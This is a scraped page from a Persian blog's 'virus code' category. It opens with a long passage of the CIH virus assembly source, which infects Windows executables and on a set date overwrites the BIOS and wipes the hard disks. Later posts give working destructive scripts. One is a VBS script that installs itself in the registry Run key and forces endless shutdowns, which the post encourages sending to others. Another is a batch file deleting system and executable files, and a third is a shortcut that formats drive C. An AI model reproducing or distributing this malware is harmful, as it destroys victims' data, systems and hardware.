OldInstallFileSystemApiHook-@3[ebx] pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: @3 = FileSystemApiHook pushad call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ; ************************************* ; * Get FilePath's DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is 'C:'. * ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 push esi mov al, [ebx+04h] cmp al, 0ffh je CallUniToBCSPath add al, 40h mov ah, ':' mov [esi], eax inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* CallUniToBCSPath: push 00000000h push FileNameBufferSize mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax push esi int 20h ; VXDCall UniToBCSPath UniToBCSPath = $ dd 00400041h add esp, 04h*04h ; ************************************* ; * Is FileName '.EXE' !? * ; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h jc DisableOnBusy push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO xchg ebx, eax ; mov ebx, FileHandle ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ; ************************************* ; * Open File Already Succeed. ^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack pushf ; Now CF = 0, Push Flag to Stack add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h pop ecx push 0000003ch pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO mov edx, [esi] ; *************************** ; * Get 'PE\0' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; * WinZip Self-Extractor * ; * doesn't Have Infected * ; * Mark Because My Virus * ; * doesn't Infect it. * ; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h jne CloseFile ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn't also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = 'PE\0\0' Signature of * ; * ImageFileHeader Pointer's * ; * Former Byte. * ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX | * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let's Set the * ; * Virus' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File push edi ; Address of Buffer ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let's Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead add edx, 07h ; Move EDX to NumberOfSections call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ; *************************** ; * Let's Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ; *************************** ; * Let's Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] push eax ; Size push edx ; Pointer of File push esi ; Address of Buffer ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h push ecx ; Save TotalSizeOfVirusCodeSectionTable add ecx, eax add ecx, edx sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] add eax, (ImageBase-@9)[esi] mov (OriginalAddressOfEntryPoint-@9)[esi], eax cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection jl OnlySetInfectedMark ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Full Modify the Bug : * ; * WinZip Self-Extractor * ; * Occurs Error... * ; *************************** ; * So When User Opens * ; * WinZip Self-Extractor, * ; * Virus Doesn't Infect it.* ; *************************** ; * First, Virus Gets the * ; * PointerToRawData in the * ; * Second Section Table, * ; * Reads the Section Data, * ; * and Tests the String of * ; * 'WinZip(R)'...... * ; *************************** xchg eax, ebp push 00000004h pop ecx push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] add edx, 12h call edi ; VXDCall IFSMgr_Ring0_FileIO ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' je NotSetInfectedMark pop edx ; *************************** ; * Let's Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx pop edi ; EDI = TotalSizeOfVirusCodeSectionTable pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp push edx ; Pointer of File add ebp, esi push ebp ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ; *************************** ; * Let's Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size add edx, edi push edx ; Pointer of File lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ; *************************** ; * Let's Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] mov ebp, offset VirusSize jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable mov ebx, (SizeOfRawData-@9)[edx] sub ebx, (VirtualSize-@9)[edx] jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx mov ebx, (PointerToRawData-@9)[edx] add ebx, (VirtualSize-@9)[edx] push ebx ; Pointer of File push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] mov [eax+4], ebx mov ebx, [eax] add (VirtualSize-@9)[edx], ebx ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h StartToWriteCodeToSections: sub ebp, ebx jbe SetVirusCodeSectionTableEndMark add edi, ebx ; Move Address of Buffer EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 jmp WriteVirusCodeToFile ; *************************** ; * Not Set Infected Mark * ; *************************** NotSetInfectedMark: add esp, 3ch jmp CloseFile ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the 'int 20h' and the * ; * 'Service Identifier' * ; * to 'Call [XXXXXXXX]'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. ^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] mov cl, VxDCallTableSize LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] mov [eax+2], edx movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] sub eax, edx loop LoopOfRestoreVxDCallID ; *************************** ; * Let's Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 mov ebx, [eax+10h] mov edi, [eax] LoopOfWriteVirusCodeToFile: pop ecx jecxz SetFileModificationMark mov esi, ecx mov eax, 0d601h pop edx pop ecx call edi ; VXDCall IFSMgr_Ring0_FileIO jmp LoopOfWriteVirusCodeToFile ; *************************** ; * Let's Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) pushf ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad mov eax, dr0 ; jmp [eax] ; Jump to prevhook ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: mov ebx, esp push dword ptr [ebx+20h+04h+14h] ; Push pioreq call [ebx+20h+04h] ; Call pIFSFunc pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ; *************************** ; * Quit My Virus' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ret ; ************************************* ; * Kill Computer !? ... *^_^* * ; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? IF DEBUG jmp DisableOnBusy ELSE jnz DisableOnBusy ENDIF ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and al,0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... * ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al,10h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h VxDCallTableSize = ($-VxDCallIDTable)/04h ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db 'CIH v' db MajorVirusVersion+'0' db '.' db MinorVirusVersion+'0' db ' TATUNG' ; ********************************************************* ; * Virus Size * ; ********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 FileModificationTime dd ? FileNameBuffer db FileNameBufferSize dup(?) @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? TimeDateStamp dd ? SymbolsPointer dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? _Characteristics dw ? Magic dw ? LinkerVersion dw ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? @9 = $ SectionAlignment dd ? FileAlignment dd ? OperatingSystemVersion dd ? ImageVersion dd ? SubsystemVersion dd ? Reserved dd ? SizeOfImage dd ? SizeOfHeaders dd ? SizeOfImageHeaderToRead = $-NumberOfSections NewAddressOfEntryPoint = DataBuffer ; DWORD SizeOfImageHeaderToWrite = 04h StartOfSectionTable = @9 SectionName = StartOfSectionTable ; QWORD VirtualSize = StartOfSectionTable+08h ; DWORD VirtualAddress = StartOfSectionTable+0ch ; DWORD SizeOfRawData = StartOfSectionTable+10h ; DWORD PointerToRawData = StartOfSectionTable+14h ; DWORD PointerToRelocations = StartOfSectionTable+18h ; DWORD PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD NumberOfRelocations = StartOfSectionTable+20h ; WORD NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD Characteristics = StartOfSectionTable+24h ; DWORD SizeOfScetionTable = Characteristics+04h-SectionName ; ********************************************************* ; * Virus Total Need Memory * ; ********************************************************* VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9 ; + NumberOfSections(??)*SizeOfScetionTable(28h) ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; ********************************************************* VirusGame ENDS END FileHeader </body> </html> </body> </html>

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:16 بعد از ظهر توسط mahyar |

ویروس بلاستر (کد ويروس)

این ویروس باعث می شه CPU کسی که اون رو توی کامپیوترش اجرا می کنه بسوزه:

ابتدا مسیر زیر را دنبال کنید:

راست کلیک بر روی دسکتاپ => New => انتخاب TextDucument

پس از باز شدن Notepad کد زیر رو درون آن بنویسید و آن را با پسوند Bat ذخیره کنید.

cpu_567hjkblaster

بهتون توسیه می کنم به هیچ وجه این فایل رو درون کامپیوترتون اجرا نکنید

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:16 بعد از ظهر توسط mahyar |

کامپيوترش بالا نمياد (کد ويروس)

اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد

كد :

Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject") Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.Write

Line "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForce

Reboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+").ExecQuery

("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+") " TxtFile.WriteLine "For

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\

Run\Restart", "c:\restart.vbs" End sub ShutDown

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:15 بعد از ظهر توسط mahyar |

ساختن ويروسی که مانع بالا آمدن ويندوز ميشه (کد ويروس)

کد:

Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject") Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.WriteLine "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForceReboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+").ExecQuery("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+") " TxtFile.WriteLine "For Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell") WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs" End sub ShutDown <p align="center" />

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:14 بعد از ظهر توسط mahyar |

ساختن یک و یروس بسیار مخرب! (کد ويروس)

ساختن یک و یروس بسیار مخرب!

خوب ساختن ویروس رو آغاز می کنم
روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:13 بعد از ظهر توسط mahyar |

:: ساخت يك ويروس (تروجان) ساده ولى خطرناك (کد ويروس)

ميخوام نوشتن يه ويروس ساده ولي خطرناك رو بهتون ياد بدم. اين ويروس چيز سختي نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات موجود در درايوى كه شما انتخاب مىكنيد پاك بشه .
روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:11 بعد از ظهر توسط mahyar |

صفحه نخست
پروفایل مدیر وبلاگ
پست الکترونیک
آرشیو وبلاگ
عناوین مطالب وبلاگ

درباره وبلاگ

ورود شما را به اين وبلاگ خوش آمد عرض مي كنم . اميدوارم مطالب اين وبلاگ مورد استفاده ي شما قرار گيرد . نقطه نظرات خود را براي بهبود وبلاگ مطرح نماييد. اماده هر گونه تبادل لینک و لوگو هستیم.برای این منظور هم نظر بدهید ...

برای بهبود کار در وبلاگ و رفع نقص ها نظرات خود را در بخش نظر ها بنویسید.

(اگه کاری . انتقادی. مشکلی جیزی داشتید ما در خدمتیم.)

پیوندهای روزانه

دیوان اشعار
سریال هر برنامه ای
کرک و سریال برنامه ها
هر جا ایران شماره هرکسی که بخای
جادوگري
موسسه اطلاعات
تغيير چهره تصاوير و ويرايش آنها با ...
بازي.سرگرمي.جك.عكس و ...
سيل خانه نيمايوشيج را تخريب كرد
موزیک فیلم هری پاتر و جام آتش
آهنگی از آلبوم هری پاتر و سنگ جادو با عنوان The Invisibility Cloak
آهنگی از آلبوم هری پاتر و سنگ جادو با عنوان Hedwigs theme
آموزش همگاني مقابله با بلاياي طبيعي
اين نرم افزار براي تغيير شكل ويندوز ملنيم است به شكلهاي هري پاتري و به ايكن هاي هري پاتري و........
نامزد انتخابات مجلس و چهار عضو اخوان المسلمين مصر دستگير شدند
Google
آرشیو پیوندهای روزانه

نوشته های پیشین

فروردین 1388
بهمن 1387
دی 1387
آذر 1387
مهر 1387
شهریور 1387
مرداد 1387
تیر 1387
خرداد 1387
اردیبهشت 1387
فروردین 1387
اسفند 1386
بهمن 1386
دی 1386
آذر 1386
آبان 1386
مهر 1386
شهریور 1386
مرداد 1386
تیر 1386
خرداد 1386
اردیبهشت 1386

آرشیو موضوعی

آموزش فلش
بوت
کتاب های الکترونيکی
کد ويروس
اموزش وبلاگنويسی
طراحی وب
آمورش ساخت فیلتر شکن
کاربردی
هک
آموزش هک
ترفند یاهو
آهنگ های صوتی و کلیپ تصویری

پیوندها

RSS

POWERED BY
BLOGFA.COM